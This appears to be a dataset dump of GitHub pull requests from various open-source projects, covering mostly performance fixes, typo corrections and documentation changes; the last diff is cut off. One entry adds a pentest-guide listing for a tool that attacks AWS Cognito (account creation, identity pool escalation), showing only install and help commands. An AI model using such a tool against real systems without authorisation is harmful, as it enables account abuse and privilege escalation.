Dataset columns:
- title: string, length 2 to 169
- diff: string, length 235 to 19.5k
- body: string, length 0 to 30.5k
- url: string, length 48 to 84
- created_at: string, length 20
- closed_at: string, length 20
- merged_at: string, length 20
- updated_at: string, length 20
- diff_len: float64, 101 to 3.99k
- repo_name: string, 83 distinct values
- __index_level_0__: int64, 15 to 52.7k
optimize stopping strings processing
diff --git a/modules/callbacks.py b/modules/callbacks.py index 51ecbdd72d..a91c94a04d 100644 --- a/modules/callbacks.py +++ b/modules/callbacks.py @@ -9,25 +9,30 @@ import modules.shared as shared -# Copied from https://github.com/PygmalionAI/gradio-ui/ class _SentinelTokenStoppingCriteria(transformers.StoppingCriteria): def __init__(self, sentinel_token_ids: list, starting_idx: int): transformers.StoppingCriteria.__init__(self) self.sentinel_token_ids = sentinel_token_ids self.starting_idx = starting_idx + self.shortest = min([x.shape[-1] for x in sentinel_token_ids]) def __call__(self, input_ids: torch.LongTensor, _scores: torch.FloatTensor) -> bool: for sample in input_ids: trimmed_sample = sample[self.starting_idx:] + trimmed_len = trimmed_sample.shape[-1] + if trimmed_len < self.shortest: + continue - for i in range(len(self.sentinel_token_ids)): - # Can't unfold, output is still too tiny. Skip. - if trimmed_sample.shape[-1] < self.sentinel_token_ids[i].shape[-1]: + for sentinel in self.sentinel_token_ids: + sentinel_len = sentinel.shape[-1] + if trimmed_len < sentinel_len: continue - for window in trimmed_sample.unfold(0, self.sentinel_token_ids[i].shape[-1], 1): - if torch.all(torch.eq(self.sentinel_token_ids[i][0], window)): - return True + + window = trimmed_sample[-sentinel_len:] + if torch.all(torch.eq(sentinel, window)): + return True + return False
# TLDR

Having a bunch of `custom_stopping_strings` made generation really slow. This PR makes it go fast again.

# Technical detail

The code for stopping tokens essentially just repeatedly scanned the *entire* generated content for stop strings. In theory this sounds fine, until you realize: the callback is run once per token generated. (This is the core principle of how streaming even works! It uses a fake stop-string processor as a callback provider!) Which means, in practice, that the stop string calculations get slower and slower as the output gets longer, for no actual reason! With many stop strings and many generated tokens, the per-token cost keeps growing, so the total work over a generation is quadratic in output length rather than linear.

I rewrote the code to only check the most recently generated token(s) for a match (a simplified sketch of this tail-only check follows the description below). I also added a few small bonus optimizations (precomputing values that never change, to avoid recalculating them on every call).

If you consider the stop string count constant and the number of generated tokens `n`, this converts each stopping check from `O(n)` to `O(1)` time complexity. If you consider the stop-string count a variable `k`, then it changes from `O(nk)` to `O(k)`.

# When It Matters

This only matters if you have a bunch of stopping strings. For my test, I ran LLaMA-7B with a bunch of random stop strings:

`"waffle", "taco", "waffles", "tacos", "potato", "potatoes", "chihuahua", "chihuahuas", "dog", "dogs", "doggos", "doggo", "doggy", "doggies", "long word", "long words", "short word", "short words", "fsa", "afsfsa", "asfw2q", "124r", "5231", "421", "67853", "1223", "1224112", "6694727", "211245219", "12124", "52153", "asggaghd", "hgdasd", "saftwq623q", "adbagsbgas", "asgghewet", "t3w1253wet", "235teqwhsd", "adsghd5a", "523aega"`

This was originally reported as an issue by `DeSinc` on Discord, who had 30 stop strings and presumably a much more legitimate set of stop strings than my random text lol.

This also applies when there aren't so many stop strings, albeit with less difference overall. It matters more for small models (like 7B), because a smaller percentage of time is spent on the GPU generating vs. on the CPU doing side processing like stop-token checks. For larger models that only get 1 t/s anyway, the time difference proportionally matters less.

# Testing

I tested (A) the speed boost and (B) that stop strings work as intended, both in `--no-stream` and streaming mode, in chat mode. Everything worked as intended in my testing.

Regarding performance, I present a testing result table, plus before/after gifs to show the real-world difference. Testing on LLaMA-7B generating a paragraph:

stops | Old | New
---|---|---
43 stop strings | potato | 41 t/s
3 stop strings (default) | 33 t/s | 43 t/s

As you can see, with the new code, even without extra stopping strings, the tokens/sec is actually higher! I listed 43 stop strings + old code as `potato` because, well, see the gif below. It starts fast but rapidly slows to a crawl, roughly 2 t/s by the time it hits the 200-token generation limit.

### Before:

![stopstring_slowdown](https://github.com/oobabooga/text-generation-webui/assets/4000772/7e1c85e4-bc9e-4538-b837-6baaed51172a)

### After:

![stopstring_fast](https://github.com/oobabooga/text-generation-webui/assets/4000772/abdc2bb6-e1a6-47cd-a3dc-009b891ea7a2)

You can see in the "Before" gif that generation gets progressively slower as more tokens are generated, because the old loop rescans everything on every new token.
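For reference, here is a minimal standalone sketch of the tail-only check described above. It is not the exact PR code: it assumes each stop string has already been tokenized into a 1-D tensor, and borrows the names `sentinel_token_ids` and `starting_idx` from the diff for readability.

```python
import torch

def hit_stop_string(sample: torch.LongTensor,
                    sentinel_token_ids: list,
                    starting_idx: int) -> bool:
    """Return True if the generated tail ends with any stop-string token sequence."""
    trimmed = sample[starting_idx:]  # ignore the prompt tokens
    for sentinel in sentinel_token_ids:
        n = sentinel.shape[-1]
        # Only the last `n` tokens can possibly end with this sentinel, so the
        # work done per generated token no longer grows with output length.
        if trimmed.shape[-1] >= n and torch.equal(trimmed[-n:], sentinel):
            return True
    return False
```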
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1625
2023-04-28T12:51:00Z
2023-05-02T04:21:55Z
2023-05-02T04:21:55Z
2024-03-03T00:00:02Z
398
oobabooga/text-generation-webui
26,462
Fix typos
diff --git a/docs/contributors/README.md b/docs/contributors/README.md index 20b3c278fb..9a739cd543 100644 --- a/docs/contributors/README.md +++ b/docs/contributors/README.md @@ -1,3 +1,3 @@ -Here we maintain a database of contributors, from which we generate credits on release blog posts and social medias. +Here we maintain a database of contributors, from which we generate credits on release blog posts and social media. For the HTTPie blog see: <https://httpie.io/blog>. diff --git a/docs/installation/generate.py b/docs/installation/generate.py index a67389ddd5..0597a3a429 100644 --- a/docs/installation/generate.py +++ b/docs/installation/generate.py @@ -55,7 +55,7 @@ def build_docs_structure(database: Database): tree = database[KEY_DOC_STRUCTURE] structure = [] for platform, tools_ids in tree.items(): - assert platform.isalnum(), f'{platform=} must be alpha-numeric for generated links to work' + assert platform.isalnum(), f'{platform=} must be alphanumeric for generated links to work' platform_tools = [tools[tool_id] for tool_id in tools_ids] structure.append((platform, platform_tools)) return structure diff --git a/extras/profiling/benchmarks.py b/extras/profiling/benchmarks.py index c7374f6abe..9d409debbe 100644 --- a/extras/profiling/benchmarks.py +++ b/extras/profiling/benchmarks.py @@ -13,7 +13,7 @@ Examples: - # Run everything as usual, the default is that we do 3 warmup runs + # Run everything as usual, the default is that we do 3 warm-up runs # and 5 actual runs. $ python extras/profiling/benchmarks.py @@ -188,7 +188,7 @@ def run(self, context: Context) -> pyperf.Benchmark: def main() -> None: # PyPerf will bring it's own argument parser, so configure the script. # The somewhat fast and also precise enough configuration is this. We run - # benchmarks 3 times to warmup (e.g especially for download benchmark, this + # benchmarks 3 times to warm up (e.g especially for download benchmark, this # is important). And then 5 actual runs where we record. sys.argv.extend( ['--worker', '--loops=1', '--warmup=3', '--values=5', '--processes=2']
Found via `codespell -L datas`.
https://api.github.com/repos/httpie/cli/pulls/1431
2022-08-24T13:29:17Z
2022-10-01T10:34:41Z
2022-10-01T10:34:41Z
2022-10-01T10:53:30Z
586
httpie/cli
33,834
feat: add cognito-scanner tool for AWS pentest
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index fc8d99993b..e696fd04c3 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -185,6 +185,17 @@ find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges ``` +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. + ```bash + # Installation + $ pip install cognito-scanner + # Usage + $ cognito-scanner --help + # Get information about how to use the unwanted account creation script + $ cogntio-scanner account-creation --help + # For more details go to https://github.com/padok-team/cognito-scanner + ``` + * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode * [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access
Cognito Scanner is an open-source CLI tool that makes it easy to pentest AWS Cognito instances. It can be installed as a Python package.
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/663
2023-08-08T08:43:54Z
2023-10-09T21:19:43Z
2023-10-09T21:19:43Z
2023-10-09T21:19:43Z
322
swisskyrepo/PayloadsAllTheThings
8,381
[MRG + 1] docs: Change example of KDTree to prevent DeprecationWarning
diff --git a/sklearn/neighbors/binary_tree.pxi b/sklearn/neighbors/binary_tree.pxi index de1e367b06461..db658f29b4d50 100755 --- a/sklearn/neighbors/binary_tree.pxi +++ b/sklearn/neighbors/binary_tree.pxi @@ -293,11 +293,10 @@ Examples Query for k-nearest neighbors >>> import numpy as np - >>> np.random.seed(0) >>> X = np.random.random((10, 3)) # 10 points in 3 dimensions >>> tree = {BinaryTree}(X, leaf_size=2) # doctest: +SKIP - >>> dist, ind = tree.query(X[0], k=3) # doctest: +SKIP + >>> dist, ind = tree.query([X[0]], k=3) # doctest: +SKIP >>> print ind # indices of 3 closest neighbors [0 3 1] >>> print dist # distances to 3 closest neighbors
#### Reference Issue
Fixes #6906

#### What does this implement/fix? Explain your changes.
- fill in missing import statement of sklearn.neighbors.KDTree
- wrap X in a list

#### Any other comments?
Changes to be committed: modified: sklearn/neighbors/binary_tree.pxi

Resolves: #6906
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/6962
2016-07-06T17:22:11Z
2016-07-16T08:08:46Z
2016-07-16T08:08:46Z
2016-07-16T08:08:49Z
240
scikit-learn/scikit-learn
46,725
[3.10] Add missing 'is' to `cmath.log()` docstring (GH-102049)
diff --git a/Modules/clinic/cmathmodule.c.h b/Modules/clinic/cmathmodule.c.h index 4b6653aa219422..d4779a98d803ce 100644 --- a/Modules/clinic/cmathmodule.c.h +++ b/Modules/clinic/cmathmodule.c.h @@ -638,7 +638,7 @@ PyDoc_STRVAR(cmath_log__doc__, "\n" "log(z[, base]) -> the logarithm of z to the given base.\n" "\n" -"If the base not specified, returns the natural logarithm (base e) of z."); +"If the base is not specified, returns the natural logarithm (base e) of z."); #define CMATH_LOG_METHODDEF \ {"log", (PyCFunction)(void(*)(void))cmath_log, METH_FASTCALL, cmath_log__doc__}, @@ -953,4 +953,4 @@ cmath_isclose(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObjec exit: return return_value; } -/*[clinic end generated code: output=353347db2e808e0d input=a9049054013a1b77]*/ +/*[clinic end generated code: output=717d3d9f0640e893 input=a9049054013a1b77]*/ diff --git a/Modules/cmathmodule.c b/Modules/cmathmodule.c index 0f22049a170848..0c3241fd4b4f5e 100644 --- a/Modules/cmathmodule.c +++ b/Modules/cmathmodule.c @@ -950,12 +950,12 @@ cmath.log log(z[, base]) -> the logarithm of z to the given base. -If the base not specified, returns the natural logarithm (base e) of z. +If the base is not specified, returns the natural logarithm (base e) of z. [clinic start generated code]*/ static PyObject * cmath_log_impl(PyObject *module, Py_complex x, PyObject *y_obj) -/*[clinic end generated code: output=4effdb7d258e0d94 input=230ed3a71ecd000a]*/ +/*[clinic end generated code: output=4effdb7d258e0d94 input=e1f81d4fcfd26497]*/ { Py_complex y;
Fix missing 'is' in cmath.log() docstring. (cherry picked from commit 71f614ef2a3d66213b9cae807cbbc1ed03741221) Automerge-Triggered-By: GH:mdickinson
https://api.github.com/repos/python/cpython/pulls/102280
2023-02-26T13:33:45Z
2023-02-26T14:56:11Z
2023-02-26T14:56:11Z
2023-02-26T14:56:20Z
529
python/cpython
3,993
Fix a typo
diff --git a/README.md b/README.md index e2cd15563..55828052a 100644 --- a/README.md +++ b/README.md @@ -175,7 +175,7 @@ using the matched rule and runs it. Rules enabled by default are as follows: * `git_pull_clone` &ndash; clones instead of pulling when the repo does not exist; * `git_push` &ndash; adds `--set-upstream origin $branch` to previous failed `git push`; * `git_push_pull` &ndash; runs `git pull` when `push` was rejected; -* `git_rebase_no_changes` &ndash runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; +* `git_rebase_no_changes` &ndash; runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; * `git_rm_recursive` &ndash; adds `-r` when you try to `rm` a directory; * `git_remote_seturl_add` &ndash; runs `git remote add` when `git remote set_url` on nonexistant remote; * `git_stash` &ndash; stashes you local modifications before rebasing or switching branch;
https://api.github.com/repos/nvbn/thefuck/pulls/518
2016-06-23T12:33:47Z
2016-06-27T20:15:41Z
2016-06-27T20:15:41Z
2016-06-27T20:15:41Z
282
nvbn/thefuck
30,765
Fix: EventBus: match null value for anything-but rule
diff --git a/localstack/services/events/provider.py b/localstack/services/events/provider.py index f34c1fe47c006..5cf2125b6b82c 100644 --- a/localstack/services/events/provider.py +++ b/localstack/services/events/provider.py @@ -516,9 +516,9 @@ def filter_event_based_on_event_format( ): def filter_event(event_pattern_filter: Dict[str, Any], event: Dict[str, Any]): for key, value in event_pattern_filter.items(): - # match keys in the event in a case-agnostic way - event_value = event.get(key.lower(), event.get(key)) - if event_value is None: + fallback = object() + event_value = event.get(key.lower(), event.get(key, fallback)) + if event_value is fallback: return False # 1. check if certain values in the event do not match the expected pattern diff --git a/tests/aws/services/events/test_events.py b/tests/aws/services/events/test_events.py index 7aa2c5ab458b8..65fba00aa15b5 100644 --- a/tests/aws/services/events/test_events.py +++ b/tests/aws/services/events/test_events.py @@ -393,17 +393,20 @@ def _put_events_with_filter_to_sqs( assert rs["FailedEntries"] == [] try: + messages = [] for entry_asserts in entries_asserts: entries = entry_asserts[0] for entry in entries: entry.setdefault("EventBusName", bus_name) - self._put_entries_assert_results_sqs( + message = self._put_entries_assert_results_sqs( events_client, sqs_client, queue_url, entries=entries, should_match=entry_asserts[1], ) + if message is not None: + messages.extend(message) finally: clean_up( bus_name=bus_name, @@ -412,6 +415,8 @@ def _put_events_with_filter_to_sqs( queue_url=queue_url, ) + return messages + yield _put_events_with_filter_to_sqs def _put_entries_assert_results_sqs( @@ -433,10 +438,64 @@ def get_message(queue_url): actual_event = json.loads(messages[0]["Body"]) if "detail" in actual_event: self.assert_valid_event(actual_event) + return messages else: assert not messages + return None + + @markers.aws.validated + def test_put_events_with_rule_anything_but_to_sqs( + self, put_events_with_filter_to_sqs, snapshot + ): + snapshot.add_transformer( + [ + snapshot.transform.key_value("MD5OfBody"), + snapshot.transform.key_value("ReceiptHandle"), + snapshot.transform.jsonpath("$..EventBusName", "event-bus-name"), + ] + ) - return messages + event_detail_match = {"command": "display-message", "payload": "baz"} + event_detail_null = {"command": None, "payload": "baz"} + event_detail_no_match = {"command": "no-message", "payload": "baz"} + test_event_pattern_anything_but = { + "source": ["core.update-account-command"], + "detail-type": ["core.update-account-command"], + "detail": {"command": [{"anything-but": ["no-message"]}]}, + } + entries_match = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_match), + } + ] + entries_match_null = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_null), + } + ] + entries_no_match = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_no_match), + } + ] + + entries_asserts = [ + (entries_match, True), + (entries_match_null, True), + (entries_no_match, False), + ] + + messages = put_events_with_filter_to_sqs( + pattern=test_event_pattern_anything_but, + entries_asserts=entries_asserts, + ) + snapshot.match("rule-anything-but", messages) # TODO: 
further unify/parameterize the tests for the different target types below diff --git a/tests/aws/services/events/test_events.snapshot.json b/tests/aws/services/events/test_events.snapshot.json index 8cd4dd04ee358..2ffed622b6800 100644 --- a/tests/aws/services/events/test_events.snapshot.json +++ b/tests/aws/services/events/test_events.snapshot.json @@ -247,5 +247,50 @@ } } } + }, + "tests/aws/services/events/test_events.py::TestEvents::test_put_events_with_rule_anything_but_to_sqs": { + "recorded-date": "21-12-2023, 13:00:42", + "recorded-content": { + "rule-anything-but": [ + { + "MessageId": "<uuid:1>", + "ReceiptHandle": "<receipt-handle:1>", + "MD5OfBody": "<m-d5-of-body:1>", + "Body": { + "version": "0", + "id": "<uuid:2>", + "detail-type": "core.update-account-command", + "source": "core.update-account-command", + "account": "111111111111", + "time": "date", + "region": "<region>", + "resources": [], + "detail": { + "command": "display-message", + "payload": "baz" + } + } + }, + { + "MessageId": "<uuid:3>", + "ReceiptHandle": "<receipt-handle:2>", + "MD5OfBody": "<m-d5-of-body:2>", + "Body": { + "version": "0", + "id": "<uuid:4>", + "detail-type": "core.update-account-command", + "source": "core.update-account-command", + "account": "111111111111", + "time": "date", + "region": "<region>", + "resources": [], + "detail": { + "command": null, + "payload": "baz" + } + } + } + ] + } } }
## Motivation

As reported in [#9711](https://github.com/localstack/localstack/issues/9711), the current behavior does not fully match AWS behavior for the EventBridge pattern `anything-but` combined with a `null` value.

This rule:

```
{
    "source": ["core.update-account-command"],
    "detail-type": ["core.update-account-command"],
    "detail": {"command": [{"anything-but": ["no-message"]}]}
}
```

in combination with this message:

```
{
    "version": "0",
    "id": "<uuid:2>",
    "detail-type": "core.update-account-command",
    "source": "core.update-account-command",
    "account": "111111111111",
    "time": "date",
    "region": "<region>",
    "resources": [],
    "detail": {
        "command": null,
        "payload": "baz"
    }
}
```

does not match on LocalStack, but does correctly match on AWS. The issue arises from the default fallback of the getter used during event pattern matching: the fallback also resolves to `None`, so fields whose value is explicitly `null` are treated as missing and excluded (a small standalone illustration of this follows the description below).

## Changes

Replace the default fallback used during event pattern matching with a dedicated sentinel, so that only genuinely missing keys are rejected. Potential pitfall: if a plain string were used as the sentinel, a message that happened to contain that exact value could still be matched incorrectly; using a unique sentinel object avoids this.

## Testing

To extend snapshot testing for event messages, the custom fixture that handles setting up the prerequisites, posting the message, retrieving the message, and comparing it was extended to also return the message content. Although comparing expected and actual message values is still handled inside the fixture, additional snapshot matching is implemented to ensure AWS parity.
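To see the getter problem in isolation, here is a small hypothetical sketch (illustrative names, not LocalStack code) of why a `None` default conflates a missing key with an explicit `null` value, and how a sentinel object distinguishes the two:

```python
event = {"command": None, "payload": "baz"}  # "command" exists, but its value is null

# Buggy pattern: a None default cannot tell "missing key" from "value is null".
if event.get("command") is None:
    print("treated as missing -> event wrongly rejected")

# Fixed pattern: only a genuinely absent key returns the sentinel.
_MISSING = object()
value = event.get("command", _MISSING)
if value is _MISSING:
    print("key really is missing")
else:
    print("key present, value:", value)  # key present, value: None
```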
https://api.github.com/repos/localstack/localstack/pulls/9925
2023-12-21T12:44:29Z
2023-12-22T14:30:35Z
2023-12-22T14:30:35Z
2024-01-22T17:33:21Z
1,507
localstack/localstack
28,458
remove --py36
diff --git a/README.md b/README.md index 57272aefc3..8df2f9edc3 100644 --- a/README.md +++ b/README.md @@ -77,11 +77,6 @@ Options: Python versions that should be supported by Black's output. [default: per-file auto- detection] - --py36 Allow using Python 3.6-only syntax on all - input files. This will put trailing commas - in function signatures and calls also after - *args and **kwargs. [default: per-file - auto-detection] --pyi Format all input files like typing stubs regardless of file extension (useful when piping source on standard input). @@ -576,7 +571,7 @@ to denote a significant space character. ```toml [tool.black] line-length = 88 -py36 = true +target_version = ['cpy37'] include = '\.pyi?$' exclude = ''' @@ -944,6 +939,8 @@ More details can be found in [CONTRIBUTING](CONTRIBUTING.md). ### 19.2b0 +* removed `--py36` (use `--target-version=cpy36` instead) (#724) + * long `del` statements are now split into multiple lines (#698) * *Black* no longer normalizes numeric literals to include `_` separators (#696) diff --git a/black.py b/black.py index 8f50d3e217..2850ae1a19 100644 --- a/black.py +++ b/black.py @@ -248,15 +248,6 @@ def read_pyproject_toml( "per-file auto-detection]" ), ) -@click.option( - "--py36", - is_flag=True, - help=( - "Allow using Python 3.6-only syntax on all input files. This will put " - "trailing commas in function signatures and calls also after *args and " - "**kwargs. [default: per-file auto-detection]" - ), -) @click.option( "--pyi", is_flag=True, @@ -360,7 +351,6 @@ def main( diff: bool, fast: bool, pyi: bool, - py36: bool, skip_string_normalization: bool, quiet: bool, verbose: bool, @@ -372,13 +362,7 @@ def main( """The uncompromising code formatter.""" write_back = WriteBack.from_configuration(check=check, diff=diff) if target_version: - if py36: - err(f"Cannot use both --target-version and --py36") - ctx.exit(2) - else: - versions = set(target_version) - elif py36: - versions = PY36_VERSIONS + versions = set(target_version) else: # We'll autodetect later. versions = set() @@ -2446,8 +2430,8 @@ def delimiter_split( ) -> Iterator[Line]: """Split according to delimiters of the highest priority. - If `py36` is True, the split will add trailing commas also in function - signatures that contain `*` and `**`. + If `supports_trailing_commas` is True, the split will add trailing commas + also in function signatures that contain `*` and `**`. 
""" try: last_leaf = line.leaves[-1] diff --git a/pyproject.toml b/pyproject.toml index fca50554ed..c42c33f37b 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -7,7 +7,7 @@ [tool.black] line-length = 88 -py36 = true +target_version = ['cpy36', 'cpy37', 'cpy38'] include = '\.pyi?$' exclude = ''' /( diff --git a/tests/test_black.py b/tests/test_black.py index 3404e058e1..21a7f2d53b 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -43,6 +43,9 @@ THIS_FILE = Path(__file__) THIS_DIR = THIS_FILE.parent EMPTY_LINE = "# EMPTY LINE WITH WHITESPACE" + " (this comment will be removed)" +PY36_ARGS = [ + f"--target-version={version.name.lower()}" for version in black.PY36_VERSIONS +] T = TypeVar("T") R = TypeVar("R") @@ -1160,10 +1163,10 @@ def test_single_file_force_py36(self) -> None: path = (workspace / "file.py").resolve() with open(path, "w") as fh: fh.write(source) - self.invokeBlack([str(path), "--py36"]) + self.invokeBlack([str(path), *PY36_ARGS]) with open(path, "r") as fh: actual = fh.read() - # verify cache with --py36 is separate + # verify cache with --target-version is separate py36_cache = black.read_cache(py36_mode) self.assertIn(path, py36_cache) normal_cache = black.read_cache(reg_mode) @@ -1183,12 +1186,12 @@ def test_multi_file_force_py36(self) -> None: for path in paths: with open(path, "w") as fh: fh.write(source) - self.invokeBlack([str(p) for p in paths] + ["--py36"]) + self.invokeBlack([str(p) for p in paths] + PY36_ARGS) for path in paths: with open(path, "r") as fh: actual = fh.read() self.assertEqual(actual, expected) - # verify cache with --py36 is separate + # verify cache with --target-version is separate pyi_cache = black.read_cache(py36_mode) normal_cache = black.read_cache(reg_mode) for path in paths: @@ -1198,7 +1201,9 @@ def test_multi_file_force_py36(self) -> None: def test_pipe_force_py36(self) -> None: source, expected = read_data("force_py36") result = CliRunner().invoke( - black.main, ["-", "-q", "--py36"], input=BytesIO(source.encode("utf8")) + black.main, + ["-", "-q", "--target-version=cpy36"], + input=BytesIO(source.encode("utf8")), ) self.assertEqual(result.exit_code, 0) actual = result.output
Fixes #703.
https://api.github.com/repos/psf/black/pulls/724
2019-02-23T05:58:41Z
2019-02-24T17:15:04Z
2019-02-24T17:15:04Z
2019-02-24T17:15:08Z
1,471
psf/black
24,317
fix(bug): toml misconfiguration
diff --git a/pyproject.toml b/pyproject.toml index 52bd0b921a..fd505f4dbf 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -11,6 +11,7 @@ dependencies = [ 'black == 23.3.0', 'openai == 0.27.8', 'ruff == 0.0.272', + 'pre-commit == 3.3.3', 'typer == 0.9.0' ]
"pre-commit: command not found" was generated upon clean codepsace; "pre-commit" was in /requirements.txt, but missing in .toml file. **Steps to reproduce** - create default Codespace - run `make install` - See error: `pre-commit: command not found`
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/189
2023-06-19T07:18:36Z
2023-06-19T11:09:15Z
2023-06-19T11:09:15Z
2023-06-19T11:09:23Z
123
gpt-engineer-org/gpt-engineer
33,112
identity: Autodetect FreeIPA server with DNS
diff --git a/lib/ansible/module_utils/ipa.py b/lib/ansible/module_utils/ipa.py index 381afac7d12583..0d3eb1d3b45ead 100644 --- a/lib/ansible/module_utils/ipa.py +++ b/lib/ansible/module_utils/ipa.py @@ -28,13 +28,28 @@ # USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import json +import socket import re from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.module_utils.six import PY3 from ansible.module_utils.six.moves.urllib.parse import quote from ansible.module_utils.urls import fetch_url -from ansible.module_utils.basic import env_fallback +from ansible.module_utils.basic import env_fallback, AnsibleFallbackNotFound + + +def _env_then_dns_fallback(*args, **kwargs): + ''' Load value from environment or DNS in that order''' + try: + return env_fallback(*args, **kwargs) + except AnsibleFallbackNotFound: + # If no host was given, we try to guess it from IPA. + # The ipa-ca entry is a standard entry that IPA will have set for + # the CA. + try: + return socket.gethostbyaddr(socket.gethostbyname('ipa-ca'))[0] + except Exception: + raise AnsibleFallbackNotFound class IPAClient(object): @@ -181,7 +196,7 @@ def modify_if_diff(self, name, ipa_list, module_list, add_method, remove_method, def ipa_argument_spec(): return dict( ipa_prot=dict(type='str', default='https', choices=['http', 'https'], fallback=(env_fallback, ['IPA_PROT'])), - ipa_host=dict(type='str', default='ipa.example.com', fallback=(env_fallback, ['IPA_HOST'])), + ipa_host=dict(type='str', default='ipa.example.com', fallback=(_env_then_dns_fallback, ['IPA_HOST'])), ipa_port=dict(type='int', default=443, fallback=(env_fallback, ['IPA_PORT'])), ipa_user=dict(type='str', default='admin', fallback=(env_fallback, ['IPA_USER'])), ipa_pass=dict(type='str', required=True, no_log=True, fallback=(env_fallback, ['IPA_PASS'])), diff --git a/lib/ansible/plugins/doc_fragments/ipa.py b/lib/ansible/plugins/doc_fragments/ipa.py index d2017b7e4eb70e..20f4c81a17d7c3 100644 --- a/lib/ansible/plugins/doc_fragments/ipa.py +++ b/lib/ansible/plugins/doc_fragments/ipa.py @@ -18,7 +18,9 @@ class ModuleDocFragment(object): description: - IP or hostname of IPA server. - If the value is not specified in the task, the value of environment variable C(IPA_HOST) will be used instead. - - If both the environment variable C(IPA_HOST) and the value are not specified in the task, then default value is set. + - If both the environment variable C(IPA_HOST) and the value are not specified in the task, then DNS will be used to try to discover the FreeIPA server. + - The relevant entry needed in FreeIPA is the 'ipa-ca' entry. + - If neither the DNS entry, nor the environment C(IPA_HOST), nor the value are available in the task, then the default value will be used. - 'Environment variable fallback mechanism is added in version 2.5.' default: ipa.example.com ipa_user:
##### SUMMARY
This adds the ability for the FreeIPA-related modules to auto-detect the IPA server through DNS. It takes advantage of the fact that a lot of FreeIPA deployments configure their hosts to use IPA as the nameserver. This check is only used if neither the ipa_host parameter nor the IPA_HOST environment variable is set.

##### ISSUE TYPE
- Feature Pull Request

##### COMPONENT NAME
identity

##### ADDITIONAL INFORMATION
This makes it easier to use the IPA-related modules: one no longer needs to include the hostname of the IPA server if the nodes are enrolled in it and use IPA as their nameserver. This way, the same playbook can be reused across deployments in a more general fashion.

So, instead of always adding the host to create a service, like this:

```
- hosts: localhost
  tasks:
    - ipa_service:
        name: beer/some-host.mydomain.example.com
        state: present
        force: true
        ipa_host: ipa.mydomain.example.com
        ipa_user: admin
        ipa_pass: my-super-secret-password
```

you can now simply omit it as follows:

```
- hosts: localhost
  tasks:
    - ipa_service:
        name: beer/some-host.mydomain.example.com
        state: present
        force: true
        ipa_user: admin
        ipa_pass: my-super-secret-password
```

assuming that the host running this resolves the appropriate DNS entries.
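For clarity, the DNS discovery the new fallback performs boils down to the lookup below. This is a simplified sketch of the `_env_then_dns_fallback` helper from the diff, without the environment-variable handling or error fallback; `ipa-ca` is the standard record FreeIPA creates for its CA.

```python
import socket

def guess_ipa_host() -> str:
    # Forward-resolve the well-known 'ipa-ca' name, then reverse-resolve the
    # address to obtain the canonical hostname of the FreeIPA server.
    return socket.gethostbyaddr(socket.gethostbyname("ipa-ca"))[0]
```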
https://api.github.com/repos/ansible/ansible/pulls/50988
2019-01-16T16:37:49Z
2019-02-01T08:19:05Z
2019-02-01T08:19:05Z
2019-07-25T16:33:47Z
804
ansible/ansible
49,109
Add new algorithm for Armstrong numbers
diff --git a/maths/armstrong_numbers.py b/maths/armstrong_numbers.py index af25688dbacc..ce8c62182fd9 100644 --- a/maths/armstrong_numbers.py +++ b/maths/armstrong_numbers.py @@ -1,26 +1,24 @@ """ -An Armstrong number is equal to the sum of its own digits each raised -to the power of the number of digits. +An Armstrong number is equal to the sum of its own digits each raised to the +power of the number of digits. + For example, 370 is an Armstrong number because 3*3*3 + 7*7*7 + 0*0*0 = 370. -An Armstrong number is often called Narcissistic number. + +Armstrong numbers are also called Narcissistic numbers and Pluperfect numbers. + +On-Line Encyclopedia of Integer Sequences entry: https://oeis.org/A005188 """ +PASSING = (1, 153, 370, 371, 1634, 24678051, 115132219018763992565095597973971522401) +FAILING = (-153, -1, 0, 1.2, 200, "A", [], {}, None) def armstrong_number(n: int) -> bool: """ Return True if n is an Armstrong number or False if it is not. - >>> armstrong_number(153) + >>> all(armstrong_number(n) for n in PASSING) True - >>> armstrong_number(200) - False - >>> armstrong_number(1634) - True - >>> armstrong_number(0) - False - >>> armstrong_number(-1) - False - >>> armstrong_number(1.2) + >>> any(armstrong_number(n) for n in FAILING) False """ if not isinstance(n, int) or n < 1: @@ -43,15 +41,46 @@ def armstrong_number(n: int) -> bool: return n == sum -def narcissistic_number(n: int) -> bool: - """Return True if n is a narcissistic number or False if it is not""" +def pluperfect_number(n: int) -> bool: + """Return True if n is a pluperfect number or False if it is not + + >>> all(armstrong_number(n) for n in PASSING) + True + >>> any(armstrong_number(n) for n in FAILING) + False + """ + if not isinstance(n, int) or n < 1: + return False + + # Init a "histogram" of the digits + digit_histogram = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] + digit_total = 0 + sum = 0 + temp = n + while temp > 0: + temp, rem = divmod(temp, 10) + digit_histogram[rem] += 1 + digit_total += 1 + + for (cnt, i) in zip(digit_histogram, range(len(digit_histogram))): + sum += cnt * i ** 